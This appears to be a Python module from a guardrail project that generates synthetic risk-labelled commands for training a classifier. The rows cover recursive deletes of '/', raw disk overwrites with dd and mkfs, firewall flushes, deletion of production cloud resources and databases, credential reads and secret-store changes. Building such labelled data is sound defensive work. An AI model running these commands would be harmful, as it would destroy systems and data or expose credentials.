"""Templated bootstrap corpus.

Real coverage needs real command traffic. Until then this module expands a hand
written table of command families into a deterministic starter corpus that follows
the guardrail model:

    risk = destructive operation x scope x irreversibility x bypass flags

Every row's level is an explicit table entry (``scope.level`` plus ``variant.shift``),
never a heuristic, so the labels stay auditable and diffable. Scope notes explain
command-visible risk, not verified deployment facts: opaque resource IDs do not
identify production, and names such as "dev" do not prove data is disposable.
Rows are tagged
``source="synthetic:templates-v1"``; drop them with ``build-data --no-synthetic``
once real labelled traffic exists.

Commands produced by one family and scope form a *group*; splits are group-wise, so
variants of the same command never straddle train and test.
"""

from __future__ import annotations

import re

from collections.abc import Iterator, Sequence
from dataclasses import dataclass, field
from pathlib import Path
from typing import Final

from model_gym.data.schema import RiskRecord, write_jsonl
from model_gym.labels import Level

SOURCE: Final[str] = "synthetic:templates-v1"

_SPACE_RUN = re.compile(r" +")
_SPACE_BEFORE_PUNCT = re.compile(r" +([;,])")


def _render(template: str, **fields: str) -> str:
    """Format a command template and collapse the whitespace left by empty fields."""
    rendered = template.format(**fields)
    rendered = _SPACE_RUN.sub(" ", rendered).strip()
    return _SPACE_BEFORE_PUNCT.sub(r"\1", rendered)


def _sentence(*parts: str) -> str:
    text = "; ".join(part.strip().rstrip(".") for part in parts if part and part.strip())
    if not text:
        return ""
    text = text[0].upper() + text[1:]
    return text if text.endswith(".") else text + "."


@dataclass(frozen=True, slots=True)
class Scope:
    """A target and its severity; targets with the same risk scope share a key."""

    key: str
    text: str
    level: int
    note: str = ""


@dataclass(frozen=True, slots=True)
class Variant:
    """A way of invoking the operation; ``shift`` moves the level, clamped to the taxonomy.

    ``category`` overrides the family category when one family spans tools, as the
    read-only inspection family does.
    """

    name: str
    shift: int = 0
    prefix: str = ""
    args: str = ""
    body: str = ""
    note: str = ""
    category: str | None = None


@dataclass(frozen=True, slots=True)
class Family:
    """One command family: a template realized over scopes and variants."""

    name: str
    category: str
    shell: str
    template: str
    note: str
    scopes: tuple[Scope, ...]
    variants: tuple[Variant, ...] = field(default_factory=lambda: (Variant("plain"),))
    group_by: str = "scope"

    def level_for(self, scope: Scope, variant: Variant) -> Level:
        return Level(max(int(Level.CRITICAL), min(int(Level.LOW_RISK), scope.level + variant.shift)))

    def group_for(self, scope: Scope, variant: Variant) -> str:
        suffix = variant.name if self.group_by == "variant" else scope.key
        return f"{self.name}:{suffix}"

    def record(self, scope: Scope, variant: Variant) -> RiskRecord:
        return RiskRecord(
            command=_render(
                self.template,
                prefix=variant.prefix,
                body=variant.body,
                args=variant.args,
                scope=scope.text,
            ),
            level=self.level_for(scope, variant),
            category=variant.category or self.category,
            group=self.group_for(scope, variant),
            shell=self.shell,
            reason=_sentence(self.note, scope.note, variant.note),
            source=SOURCE,
        )

    def records(self) -> Iterator[RiskRecord]:
        for scope in self.scopes:
            for variant in self.variants:
                yield self.record(scope, variant)


FAMILIES: Final[tuple[Family, ...]] = (
    Family(
        name="rm_recursive",
        category="shell",
        shell="bash",
        template="{prefix}rm {args} {scope}",
        note="Recursive deletion of a directory tree",
        scopes=(
            Scope("tmp", "/tmp/scratch/", 3, "scratch directory that is recreated on demand"),
            Scope("build", "./build/", 3, "build output regenerated by the next build"),
            Scope("app_data", "/srv/application-data/", 2, "application data with no separate copy"),
            Scope("db_data", "/var/lib/postgresql/data", 2, "PostgreSQL data directory"),
            Scope("backups", "/var/backups/", 2, "local backup directory"),
            Scope("root", "/", 1, "the filesystem root"),
            Scope("glob_root", "/*", 1, "every top level path on the filesystem"),
        ),
        variants=(
            Variant("recursive", args="-r"),
            Variant("force_recursive", args="-rf"),
            Variant("sudo_force_recursive", prefix="sudo ", args="-rf", shift=-1, note="run with elevated privileges"),
            Variant(
                "no_preserve_root",
                args="-rf --no-preserve-root",
                shift=-1,
                note="the built in protection against deleting / is disabled",
            ),
        ),
    ),
    Family(
        name="find_delete",
        category="shell",
        shell="bash",
        template="{prefix}find {scope} {args} -delete",
        note="Bulk deletion driven by find",
        scopes=(
            Scope("tmp", "/tmp/cache", 3, "cached files"),
            Scope("build", "./build", 3, "build output"),
            Scope("logs", "/var/log", 3, "log directory that running services still write to"),
            Scope("app_data", "/srv/application-data", 2, "application data with no separate copy"),
            Scope("root", "/", 1, "the filesystem root"),
        ),
        variants=(
            Variant("files", args="-type f"),
            Variant("dirs", args="-type d"),
            Variant("sudo_files", prefix="sudo ", args="-type f", shift=-1, note="run with elevated privileges"),
        ),
    ),
    Family(
        name="shred_file",
        category="shell",
        shell="bash",
        template="{prefix}shred {args} {scope}",
        note="Shredding a file, which is designed to prevent recovery",
        scopes=(
            Scope("env", "./secrets.env", 3, "local secret file"),
            Scope("session_key", "/tmp/session.key", 3, "temporary session key"),
            Scope("app_data", "/srv/application-data/", 2, "application data with no separate copy"),
            Scope("signing_key", "/srv/application-data/keys/signing.pem", 2, "production signing key"),
            Scope("db_backup", "/var/backups/postgres.dump", 2, "only local database backup"),
        ),
        variants=(
            Variant("unlink", args="-u"),
            Variant("zero_fill", args="-u -z -n 3", note="overwrites with zeros after shredding"),
            Variant("sudo_unlink", prefix="sudo ", args="-u", shift=-1, note="run with elevated privileges"),
        ),
    ),
    Family(
        name="truncate_file",
        category="shell",
        shell="bash",
        template="{prefix}truncate {args} {scope}",
        note="Truncating a file to zero length",
        scopes=(
            Scope("tmp", "/tmp/scratch.bin", 3, "temporary file"),
            Scope("build", "./build/artifact.bin", 3, "build artifact"),
            Scope("app_db", "/srv/application-data/important.db", 1, "live application database file"),
            Scope(
                "pg_heap",
                "/var/lib/postgresql/data/base/16384/2619",
                1,
                "a PostgreSQL heap file that the server still has open",
            ),
        ),
        variants=(
            Variant("zero", args="-s 0"),
            Variant("sudo_zero", prefix="sudo ", args="-s 0", shift=-1, note="run with elevated privileges"),
        ),
    ),
    Family(
        name="redirect_overwrite",
        category="shell",
        shell="bash",
        template="{prefix}{body} {args} {scope}",
        note="Shell redirection into a file",
        scopes=(
            Scope("tmp_log", "/tmp/out.log", 4, "throwaway log file"),
            Scope("build_out", "./build/output.txt", 3, "build output"),
            Scope("app_config", "/srv/application-data/config.yaml", 3, "configuration the application reads at start"),
            Scope("app_db", "/srv/application-data/important.db", 1, "live application database file"),
            Scope("etc_hosts", "/etc/hosts", 2, "host name resolution file"),
            Scope("block_device", "/dev/sda", 1, "a raw block device"),
        ),
        variants=(
            Variant("dev_null", body="cat /dev/null", args=">"),
            Variant("echo_test", body="echo test", args=">"),
            Variant("append", body="echo test", args=">>", shift=1, note="appends instead of overwriting"),
        ),
    ),
    Family(
        name="dd_overwrite",
        category="shell",
        shell="bash",
        template="{prefix}dd if={body} of={scope} bs=1M {args}",
        note="Raw block level write with dd",
        scopes=(
            Scope("disk", "/dev/sda", 1, "a whole disk"),
            Scope("nvme", "/dev/nvme0n1", 1, "a whole NVMe disk"),
            Scope("partition", "/dev/sdb1", 1, "a mounted partition"),
            Scope("image", "./disk.img", 3, "a local image file"),
        ),
        variants=(
            Variant("zeros", body="/dev/zero"),
            Variant("urandom", body="/dev/urandom"),
            Variant("single_block", body="/dev/zero", args="count=1", shift=1, note="one block limits the damage"),
        ),
    ),
    Family(
        name="mkfs",
        category="shell",
        shell="bash",
        template="{prefix}mkfs.{body} {scope}",
        note="Creating a new filesystem on a device",
        scopes=(
            Scope("disk", "/dev/sda", 1, "a whole disk"),
            Scope("partition", "/dev/nvme0n1p2", 1, "an existing partition"),
            Scope("image", "./disk.img", 3, "a local image file"),
        ),
        variants=(Variant("ext4", body="ext4"), Variant("xfs", body="xfs"), Variant("vfat", body="vfat")),
    ),
    Family(
        name="wipefs",
        category="shell",
        shell="bash",
        template="{prefix}wipefs {args} {scope}",
        note="Removing filesystem signatures from a device",
        scopes=(Scope("disk", "/dev/sda", 1, "a whole disk"), Scope("partition", "/dev/nvme0n1p1", 1, "a partition")),
        variants=(
            Variant("all", args="-a"),
            Variant("all_force", args="-a -f", note="wipe forced on a mounted device"),
        ),
    ),
    Family(
        name="chmod_recursive",
        category="shell",
        shell="bash",
        template="{prefix}chmod -R {args} {scope}",
        note="Recursive permission change",
        scopes=(
            Scope("root", "/", 1, "every file on the host"),
            Scope("app", "/srv/app", 3, "the deployed application tree"),
            Scope("home", "/home/deploy", 3, "the deploy user's home directory"),
            Scope("build", "./build", 4, "build output"),
        ),
        variants=(
            Variant("world_writable", args="777", note="makes every path world writable"),
            Variant("no_access", args="000", note="removes access for the owner as well"),
            Variant("group_writable", args="775", shift=1, note="adds group write access"),
        ),
    ),
    Family(
        name="chown_recursive",
        category="shell",
        shell="bash",
        template="{prefix}chown -R {args} {scope}",
        note="Recursive ownership change",
        scopes=(
            Scope("root", "/", 1, "every file on the host"),
            Scope("app", "/srv/app", 3, "the deployed application tree"),
            Scope("home", "/home/deploy", 3, "the deploy user's home directory"),
            Scope("build", "./build", 4, "build output"),
        ),
        variants=(
            Variant("root_root", args="root:root"),
            Variant("nobody", args="nobody:nogroup", shift=1, note="hands ownership to an unprivileged account"),
        ),
    ),
    Family(
        name="iptables_flush",
        category="system",
        shell="bash",
        template="{prefix}iptables {args}",
        note="Removing firewall rules",
        scopes=(Scope("host", "", 2, "fires on the host"),),
        variants=(
            Variant("flush", args="-F"),
            Variant("flush_nat", args="-t nat -F", shift=1, note="only the NAT table"),
            Variant(
                "accept_default",
                args="-F && iptables -P INPUT ACCEPT",
                shift=-1,
                note="the default policy is also set to accept, leaving the host unfiltered",
            ),
        ),
    ),
    Family(
        name="systemctl_impact",
        category="system",
        shell="bash",
        template="{prefix}systemctl {args} {scope}",
        note="Stopping or disabling a systemd unit",
        scopes=(
            Scope("sshd", "sshd", 3, "remote administration access may be lost"),
            Scope("nginx", "nginx", 3, "web traffic stops being served"),
            Scope("docker", "docker", 3, "containers on the host stop"),
            Scope("networkd", "systemd-networkd", 2, "host networking configuration is dropped"),
            Scope("postgresql", "postgresql", 3, "the database stops accepting connections"),
        ),
        variants=(
            Variant("disable_now", args="disable --now"),
            Variant("disable", args="disable", shift=1, note="takes effect on the next boot only"),
            Variant("mask", args="mask --now", note="masking survives package upgrades"),
        ),
    ),
    Family(
        name="git_reset",
        category="git",
        shell="bash",
        template="{prefix}git reset {args} {scope}",
        note="Rewinding a git branch",
        scopes=(
            Scope("head", "HEAD", 3, "uncommitted tracked changes are discarded"),
            Scope("head_1", "HEAD~1", 3, "the last commit is dropped from the branch"),
            Scope("head_10", "HEAD~10", 3, "ten commits are dropped from the branch"),
            Scope("origin_main", "origin/main", 3, "local commits leave the branch; no remote ref is changed"),
        ),
        variants=(
            Variant("hard", args="--hard", note="working tree is overwritten"),
            Variant("mixed", args="--mixed", shift=1, note="working tree is kept, the index is reset"),
            Variant("soft", args="--soft", shift=1, note="changes stay staged"),
        ),
    ),
    Family(
        name="git_clean",
        category="git",
        shell="bash",
        template="{prefix}git clean {args}",
        note="Deleting untracked files",
        scopes=(Scope("repo", "", 2, "untracked and ignored files in the working tree"),),
        variants=(
            Variant("forced_ignored", args="-fdx", note="ignored files such as local .env files are deleted too"),
            Variant("forced", args="-fd", note="ignored files are kept, but untracked work has no Git recovery copy"),
            Variant("dry_run", args="-ndx", shift=4, note="dry run, nothing is deleted"),
        ),
    ),
    Family(
        name="mv_devnull",
        category="shell",
        shell="bash",
        template="{prefix}mv {args} {scope} /dev/null",
        note="Moving a path onto /dev/null",
        scopes=(
            Scope("dir", "folder", 2, "the directory tree becomes unreachable"),
            Scope("build", "./build", 3, "build output becomes unreachable"),
        ),
    ),
    Family(
        name="git_push",
        category="git",
        shell="bash",
        template="{prefix}git push {args} {scope}",
        note="Pushing to a shared remote branch",
        scopes=(
            Scope("main", "origin main", 4, "every clone and reviewer depends on this history"),
            Scope("release", "origin release/2026.09", 3, "a release branch other work is based on"),
            Scope("feature", "origin feature/x", 5, "a branch only this work uses"),
        ),
        variants=(
            Variant("plain", note="a normal fast forward push"),
            Variant("force", args="--force", shift=-2, note="history is rewritten on the remote"),
            Variant(
                "force_with_lease",
                args="--force-with-lease",
                shift=-1,
                note="the lease refuses the push if the remote moved",
            ),
            Variant("delete", args="--delete", shift=-2, note="the remote branch is deleted"),
        ),
    ),
    Family(
        name="git_branch_delete",
        category="git",
        shell="bash",
        template="{prefix}git branch -D {scope}",
        note="Force deleting a local branch",
        scopes=(
            Scope("main", "main", 3, "the local branch and its reflog are deleted, not the remote branch"),
            Scope("release", "release/2026.09", 3, "a local release branch, not the shared remote ref"),
            Scope("feature", "feature/foo", 3, "a feature branch"),
        ),
    ),
    Family(
        name="docker_reclaim",
        category="containers",
        shell="bash",
        template="{prefix}docker {scope}",
        note="Bulk docker cleanup",
        scopes=(
            Scope("rm_all", "rm -f $(docker ps -aq)", 2, "every container on the host is removed"),
            Scope(
                "prune_all_volumes",
                "system prune -af --volumes",
                1,
                "images, containers, networks and volumes are removed",
            ),
            Scope(
                "volume_rm_all",
                "volume rm $(docker volume ls -q)",
                1,
                "every named volume, including persistent data, is removed",
            ),
            Scope("rmi_all", "rmi $(docker images -q)", 2, "every local image is removed"),
            Scope("system_prune", "system prune -a", 3, "unused images and networks are removed"),
            Scope("volume_prune", "volume prune -f", 2, "unused volumes are removed"),
            Scope("network_prune", "network prune -f", 4, "only networks unreferenced by any container are removed"),
            Scope(
                "container_prune",
                "container prune -f",
                2,
                "all stopped containers and their writable layers are removed",
            ),
        ),
    ),
    Family(
        name="kubectl_delete",
        category="kubernetes",
        shell="bash",
        template="{prefix}kubectl delete {args} {scope}",
        note="Deleting Kubernetes resources",
        scopes=(
            Scope("ns_prod", "namespace production", 1, "the namespace and every object in it"),
            Scope("deploy_all_prod", "deployment --all -n production", 1, "every workload in the production namespace"),
            Scope("pvc_all_prod", "pvc --all -n production", 1, "persistent volume claims behind production data"),
            Scope(
                "pod_all_all_ns",
                "pod --all --all-namespaces",
                2,
                "every pod in the cluster; controllers recreate most of them",
            ),
            Scope("deploy_all_staging", "deployment --all -n staging", 3, "every workload in the staging namespace"),
            Scope("svc_all_staging", "svc --all -n staging", 3, "every service in the staging namespace"),
            Scope("cm_all_staging", "configmap --all -n staging", 3, "configuration consumed by staging workloads"),
            Scope("job_all_staging", "job --all -n staging", 3, "staging job history"),
            Scope("pod_single_staging", "pod api-7d9f -n staging", 4, "one pod, which its controller recreates"),
        ),
        variants=(
            Variant("plain", note="the API server performs the delete"),
            Variant("force", args="--grace-period=0 --force", shift=-1, note="no graceful termination"),
            Variant("dry_run", args="--dry-run=server", shift=4, note="server side dry run, nothing is deleted"),
        ),
    ),
    Family(
        name="helm_uninstall",
        category="kubernetes",
        shell="bash",
        template="{prefix}helm uninstall {scope} {args}",
        note="Removing a helm release",
        scopes=(
            Scope("prod", "my-app -n production", 2, "the release and its workloads are removed"),
            Scope("staging", "my-app -n staging", 3, "the release and its workloads are removed"),
            Scope("dev", "my-app -n dev", 4, "a development release"),
        ),
        variants=(
            Variant("plain"),
            Variant("keep_history", args="--keep-history", shift=1, note="the release record is retained"),
            Variant("dry_run", args="--dry-run", shift=4, note="renders the uninstall without calling the cluster"),
        ),
    ),
    Family(
        name="terraform_destroy",
        category="terraform",
        shell="bash",
        template="{prefix}terraform {scope} {body} {args}",
        note="Destroying terraform managed infrastructure",
        scopes=(
            Scope("prod", "-chdir=environments/production", 2, "the production environment"),
            Scope("staging", "-chdir=environments/staging", 3, "the explicitly selected staging environment"),
            Scope("sandbox", "-chdir=environments/sandbox", 3, "a sandbox environment"),
        ),
        variants=(
            Variant(
                "auto_approve",
                body="destroy",
                args="-auto-approve",
                shift=-1,
                note="the interactive confirmation is skipped",
            ),
            Variant("plain", body="destroy", note="an interactive confirmation is still required"),
            Variant(
                "refresh_false",
                body="destroy",
                args="-refresh=false -auto-approve",
                shift=-1,
                note="state is not refreshed first",
            ),
            Variant(
                "targeted",
                body="destroy",
                args="-target=module.database -auto-approve",
                shift=-1,
                note="scoped to the database module",
            ),
            Variant("plan", body="plan", shift=3, note="a speculative plan does not apply changes"),
            Variant(
                "plan_destroy", body="plan", args="-destroy", shift=3, note="previews destruction without applying it"
            ),
        ),
    ),
    Family(
        name="aws_ec2_terminate",
        category="aws",
        shell="bash",
        template="{prefix}aws ec2 terminate-instances --instance-ids {scope} {args}",
        note="Terminating a compute instance",
        scopes=(
            Scope("instance", "i-0a1b2c3d4e5f00001", 2, "an opaque instance ID; environment and backups are unknown"),
            Scope("instance", "i-0a1b2c3d4e5f00002", 2, "an opaque instance ID; environment and backups are unknown"),
            Scope("instance", "i-0a1b2c3d4e5f00003", 2, "an opaque instance ID; environment and backups are unknown"),
        ),
        variants=(
            Variant("plain"),
            Variant("dry_run", args="--dry-run", shift=3, note="the call is validated but not executed"),
        ),
    ),
    Family(
        name="aws_rds_delete",
        category="aws",
        shell="bash",
        template="{prefix}aws rds delete-db-instance --db-instance-identifier {scope} {args}",
        note="Deleting a managed database instance",
        scopes=(
            Scope("prod", "prod-db", 2, "the production database"),
            Scope("staging", "staging-db", 3, "the staging database"),
        ),
        variants=(
            Variant(
                "skip_final_snapshot", args="--skip-final-snapshot", shift=-1, note="no recovery snapshot is taken"
            ),
            Variant(
                "final_snapshot",
                args="--final-db-snapshot-identifier prod-db-final",
                shift=1,
                note="a final snapshot is taken",
            ),
            Variant(
                "delete_backups",
                args="--skip-final-snapshot --delete-automated-backups",
                shift=-1,
                note="automated backups are deleted as well",
            ),
        ),
    ),
    Family(
        name="aws_s3_rm",
        category="aws",
        shell="bash",
        template="{prefix}aws s3 rm s3://{scope} {args}",
        note="Deleting S3 objects",
        scopes=(
            Scope("prefix", "prod-uploads/2026/", 2, "a shared prefix"),
            Scope("object", "prod-uploads/2026/report.pdf", 3, "a single object"),
        ),
        variants=(
            Variant("recursive", args="--recursive", shift=-1, note="every object under the prefix is deleted"),
            Variant("plain"),
            Variant("dry_run", args="--dryrun", shift=3, note="no delete request is sent"),
        ),
    ),
    Family(
        name="aws_s3api_delete_bucket",
        category="aws",
        shell="bash",
        template="{prefix}aws s3api delete-bucket --bucket {scope}",
        note="Deleting an S3 bucket",
        scopes=(
            Scope("prod", "prod-assets", 2, "a production bucket"),
            Scope("staging", "staging-assets", 3, "a staging bucket"),
        ),
    ),
    Family(
        name="aws_eks_delete_cluster",
        category="aws",
        shell="bash",
        template="{prefix}aws eks delete-cluster --name {scope}",
        note="Deleting a Kubernetes control plane",
        scopes=(
            Scope("prod", "prod-cluster", 1, "the production control plane"),
            Scope("staging", "staging-cluster", 2, "the staging control plane"),
            Scope("sandbox", "sandbox-cluster", 3, "a sandbox control plane"),
        ),
    ),
    Family(
        name="aws_dynamodb_delete_table",
        category="aws",
        shell="bash",
        template="{prefix}aws dynamodb delete-table --table-name {scope}",
        note="Deleting a database table",
        scopes=(
            Scope("prod", "prod-orders", 1, "the production orders table"),
            Scope("staging", "staging-orders", 3, "the staging orders table"),
        ),
    ),
    Family(
        name="aws_cloudformation_delete_stack",
        category="aws",
        shell="bash",
        template="{prefix}aws cloudformation delete-stack --stack-name {scope}",
        note="Deleting an infrastructure stack",
        scopes=(
            Scope("prod", "prod-api", 1, "the production stack and every resource in it"),
            Scope("staging", "staging-api", 3, "the staging stack"),
        ),
    ),
    Family(
        name="gcloud_instances_delete",
        category="gcp",
        shell="bash",
        template="{prefix}gcloud compute instances delete {scope} {args}",
        note="Deleting a Compute Engine instance",
        scopes=(
            Scope("prod", "prod-web-1", 2, "a production instance"),
            Scope("staging", "staging-web-1", 3, "a staging instance"),
        ),
        variants=(
            Variant("plain", note="an interactive confirmation is still required"),
            Variant("quiet", args="--quiet", shift=-1, note="the confirmation prompt is suppressed"),
        ),
    ),
    Family(
        name="gcloud_clusters_delete",
        category="gcp",
        shell="bash",
        template="{prefix}gcloud container clusters delete {scope} {args}",
        note="Deleting a Kubernetes cluster",
        scopes=(
            Scope("prod", "prod-cluster", 1, "the production cluster"),
            Scope("staging", "staging-cluster", 2, "the staging cluster"),
        ),
        variants=(
            Variant("plain", note="an interactive confirmation is still required"),
            Variant("quiet", args="--quiet", shift=-1, note="the confirmation prompt is suppressed"),
        ),
    ),
    Family(
        name="gcloud_sql_delete",
        category="gcp",
        shell="bash",
        template="{prefix}gcloud sql instances delete {scope} {args}",
        note="Deleting a managed database instance",
        scopes=(
            Scope("prod", "prod-db", 1, "the production database"),
            Scope("staging", "staging-db", 2, "the staging database"),
        ),
        variants=(
            Variant("plain", note="an interactive confirmation is still required"),
            Variant("quiet", args="--quiet", shift=-1, note="the confirmation prompt is suppressed"),
        ),
    ),
    Family(
        name="sql_drop_database",
        category="sql",
        shell="sql",
        template="{prefix}DROP DATABASE {scope}{args};",
        note="Dropping a database",
        scopes=(
            Scope("prod", "production", 1, "the production database"),
            Scope("staging", "staging", 2, "the staging database"),
            Scope("scratch", "scratch_dev", 3, "a scratch database that can be recreated"),
        ),
        variants=(
            Variant("plain"),
            Variant("if_exists", args=" IF EXISTS", shift=1, note="no error if the database is absent"),
            Variant("with_force", args=" WITH (FORCE)", note="open connections are terminated"),
        ),
    ),
    Family(
        name="sql_drop_table",
        category="sql",
        shell="sql",
        template="{prefix}DROP TABLE {scope}{args};",
        note="Dropping a table",
        scopes=(
            Scope("users", "users", 1, "a core application table"),
            Scope("audit", "audit_log", 1, "the audit trail"),
            Scope("staging_tmp", "tmp_import_staging", 3, "a table used only by the last import"),
        ),
        variants=(
            Variant("plain"),
            Variant("cascade", args=" CASCADE", note="dependent objects are dropped as well"),
            Variant("if_exists", args=" IF EXISTS", shift=1, note="no error if the table is absent"),
        ),
    ),
    Family(
        name="sql_drop_schema",
        category="sql",
        shell="sql",
        template="{prefix}DROP SCHEMA {scope}{args};",
        note="Dropping a schema and everything in it",
        scopes=(
            Scope("public", "public", 1, "every object in the public schema"),
            Scope("staging_tmp", "staging_tmp", 3, "a scratch schema used by the last import"),
        ),
        variants=(
            Variant("plain"),
            Variant("cascade", args=" CASCADE", note="dependent objects in other schemas are dropped as well"),
        ),
    ),
    Family(
        name="sql_truncate_table",
        category="sql",
        shell="sql",
        template="{prefix}TRUNCATE TABLE {scope}{args};",
        note="Truncating a table, which removes every row",
        scopes=(
            Scope("users", "users", 1, "a core application table"),
            Scope("sessions", "sessions", 1, "every session is invalidated"),
            Scope("staging_tmp", "tmp_import_staging", 3, "a table used only by the last import"),
        ),
        variants=(
            Variant("plain"),
            Variant(
                "restart_identity",
                args=" RESTART IDENTITY CASCADE",
                note="identity sequences are reset and dependent tables are truncated",
            ),
        ),
    ),
    Family(
        name="sql_delete_rows",
        category="sql",
        shell="sql",
        template="{prefix}DELETE FROM {scope}{args};",
        note="Deleting rows",
        scopes=(
            Scope("all_users", "users", 1, "no WHERE clause, every row is deleted"),
            Scope(
                "by_age", "users WHERE created_at < NOW() - INTERVAL '7 years'", 2, "every row older than seven years"
            ),
            Scope("by_pk", "users WHERE id = 123", 3, "a single row selected by primary key"),
            Scope("expired", "sessions WHERE expires_at < NOW()", 4, "sessions that have already expired"),
            Scope("audit_window", "audit_log WHERE created_at < '2020-01-01'", 4, "one closed archive window"),
            Scope("one_tenant", "users WHERE tenant_id = 42", 4, "one tenant, which can be reimported"),
        ),
    ),
    Family(
        name="sql_revoke",
        category="sql",
        shell="sql",
        template="{prefix}REVOKE {args} ON {scope} FROM app_user;",
        note="Revoking database privileges",
        scopes=(
            Scope("database", "DATABASE production", 3, "the application loses access to the database"),
            Scope("table", "TABLE users", 4, "one table becomes unreadable"),
            Scope("schema", "SCHEMA public", 4, "object creation in the public schema stops"),
        ),
        variants=(
            Variant("all", args="ALL PRIVILEGES"),
            Variant("select", args="SELECT", shift=1, note="read access only"),
            Variant("usage", args="USAGE", shift=1, note="usage only"),
        ),
    ),
    Family(
        name="redis_flush",
        category="redis",
        shell="redis",
        template="{prefix}redis-cli -h {scope} {args}",
        note="Flushing a Redis instance",
        scopes=(
            Scope("prod", "redis-prod.internal", 1, "the production instance"),
            Scope("staging", "redis-staging.internal", 2, "the staging instance"),
            Scope("local", "localhost", 4, "a local development instance"),
        ),
        variants=(
            Variant("flushall", args="FLUSHALL", note="every database on the instance is cleared"),
            Variant("flushdb", args="FLUSHDB", shift=1, note="the connected database is cleared"),
            Variant("flushall_async", args="FLUSHALL ASYNC", note="asynchronous variant with the same data loss"),
        ),
    ),
    Family(
        name="es_delete_indices",
        category="elasticsearch",
        shell="http",
        template="{prefix}curl -X DELETE '{scope}{args}'",
        note="Deleting Elasticsearch indices",
        scopes=(
            Scope("all", "http://localhost:9200/_all", 1, "every index in the cluster"),
            Scope("wildcard", "http://localhost:9200/logs-2026.*", 2, "every index matching the wildcard"),
            Scope("single", "http://localhost:9200/logs-2026.09.01", 3, "one daily index"),
        ),
        variants=(
            Variant("plain"),
            Variant("expand", args="?expand_wildcards=all", shift=-1, note="closed and hidden indices are included"),
            Variant("pretty", args="?pretty", note="same request, human readable response"),
        ),
    ),
    Family(
        name="read_only_inspection",
        category="shell",
        shell="bash",
        template="{prefix}{body} {args} {scope}",
        note="Read-only inspection",
        scopes=(Scope("local", "", 5, "no state is modified"),),
        group_by="variant",
        variants=(
            Variant("ls_logs", body="ls -la /var/log"),
            Variant("grep_source", body="grep -R TODO ./src"),
            Variant("docker_ps", body="docker ps", category="containers"),
            Variant("kubectl_get_pods", body="kubectl get pods -n production", category="kubernetes"),
            Variant("aws_describe", body="aws ec2 describe-instances", category="aws"),
            Variant("git_status", body="git status", category="git"),
            Variant("df", body="df -h"),
            Variant("du", body="du -sh /srv/application-data"),
            Variant(
                "kubectl_secret",
                body="kubectl get secret prod-db-creds -n production -o yaml",
                shift=-1,
                note="credentials are exposed in the output",
                category="kubernetes",
            ),
            Variant(
                "pg_dump",
                body="docker exec prod-db pg_dump -U app production",
                shift=-1,
                note="the production database is dumped into the session",
                category="containers",
            ),
            Variant(
                "s3_cp_backup",
                body="aws s3 cp s3://prod-backups/latest.dump -",
                shift=-1,
                note="a production backup is streamed to the terminal",
                category="aws",
            ),
        ),
    ),
    Family(
        name="sql_select",
        category="sql",
        shell="sql",
        template="{prefix}{body} {args} {scope}",
        note="Read-only query",
        scopes=(Scope("read_only", "", 5, "no rows are modified"),),
        variants=(
            Variant("count", body="SELECT count(*) FROM users;"),
            Variant("limit", body="SELECT * FROM users LIMIT 10;"),
            Variant("join", body="SELECT u.id FROM users u JOIN orders o ON o.user_id = u.id LIMIT 50;"),
            Variant("explain", body="EXPLAIN ANALYZE SELECT * FROM orders;"),
        ),
    ),
    Family(
        name="sql_select_bulk",
        category="sql",
        shell="sql",
        template="{prefix}{body} {args} {scope}",
        note="Bulk read of audit data",
        scopes=(Scope("audit_log", "", 4, "the audit trail is printed but not modified"),),
        variants=(
            Variant("audit_all", body="SELECT * FROM audit_log;", note="an unbounded audit table is read out"),
            Variant("copy_out", body="COPY audit_log TO STDOUT;", note="the audit table is exported in bulk"),
        ),
    ),
    Family(
        name="op_item_write",
        category="onepassword",
        shell="bash",
        template="{prefix}{body} {scope} {args}",
        note="Mutating an item in the shared secret store",
        scopes=(
            Scope("prod_item", '"Production Database"', 1, "the credential deploy automation reads"),
            Scope("ci_item", '"CI Deploy Token"', 1, "pipeline authentication stops working at once"),
            Scope("customer_item", '"Acme API Key"', 1, "a customer integration credential"),
            Scope("dev_item", '"Local Dev Sandbox"', 2, "developer-only item with no production consumer"),
        ),
        variants=(
            Variant("delete", body="op item delete"),
            Variant("rotate_password", body="op item edit", args="--generate-password=32"),
            Variant("share_emails", body="op item share", args="--emails oncall@example.com --expires-in 1h"),
            Variant(
                "share_view_once",
                body="op item share",
                args="--emails oncall@example.com --view-once",
                shift=1,
                note="the link stops working after a single view, which narrows who can read the item",
            ),
            Variant(
                "archive",
                body="op item delete",
                args="--archive",
                shift=1,
                note="moved to the Archive, not Recently Deleted",
            ),
        ),
    ),
    Family(
        name="op_item_write",
        category="onepassword",
        shell="bash",
        template="{prefix}{body} {args} {scope}",
        note="Moving an item into another vault, which changes who can read it",
        scopes=(
            Scope(
                "prod_item",
                '"Production Database" --current-vault Production --destination-vault Shared',
                1,
                "access widens to every member of the shared vault",
            ),
            Scope(
                "prod_item",
                '"Production Database" --current-vault Production --destination-vault Dev',
                2,
                "a production credential is exposed to every developer",
            ),
        ),
        variants=(Variant("move", body="op item move"),),
    ),
    Family(
        name="op_group_admin",
        category="onepassword",
        shell="bash",
        template="{prefix}{body} {scope} {args}",
        note="Changing a secret-store group",
        scopes=(
            Scope("engineering", '"Engineering"', 1, "the group that holds production vault access"),
            Scope("oncall", '"Oncall"', 1, "the group that reads break-glass credentials"),
            Scope("contractors", '"Contractors"', 1, "an externally staffed group"),
        ),
        variants=(
            Variant("delete", body="op group delete"),
            Variant("rename", body="op group edit", args='--name "deprecated"'),
            Variant("grant_user", body="op group user grant --group", args="--user intern@example.com --role member"),
        ),
    ),
    Family(
        name="op_user_admin",
        category="onepassword",
        shell="bash",
        template="{prefix}{body} {scope} {args}",
        note="Changing a secret-store account",
        scopes=(
            Scope("ops_user", "ops@example.com", 1, "an account with production vault access"),
            Scope("contractor_user", "contractor@example.com", 1, "an account outside the company"),
            Scope("service_user", "ci-bot@example.com", 1, "the service account automation signs in with"),
        ),
        variants=(
            Variant("delete", body="op user delete"),
            Variant("suspend", body="op user suspend"),
            Variant("travel_mode", body="op user edit", args="--travel-mode on"),
            Variant("edit_name", body="op user edit", args="--name ops-legacy"),
        ),
    ),
    Family(
        name="op_vault_delete",
        category="onepassword",
        shell="bash",
        template="{prefix}{body} {scope} {args}",
        note="Deleting a whole secret store vault",
        scopes=(
            Scope("prod_vault", '"Production"', 1, "every production credential lives in this vault"),
            Scope("shared_vault", '"Shared"', 2, "cross-team credentials, recoverable only from a vault backup"),
            Scope("dev_vault", '"Dev"', 2, "developer-only credentials"),
        ),
        variants=(Variant("delete", body="op vault delete"),),
    ),
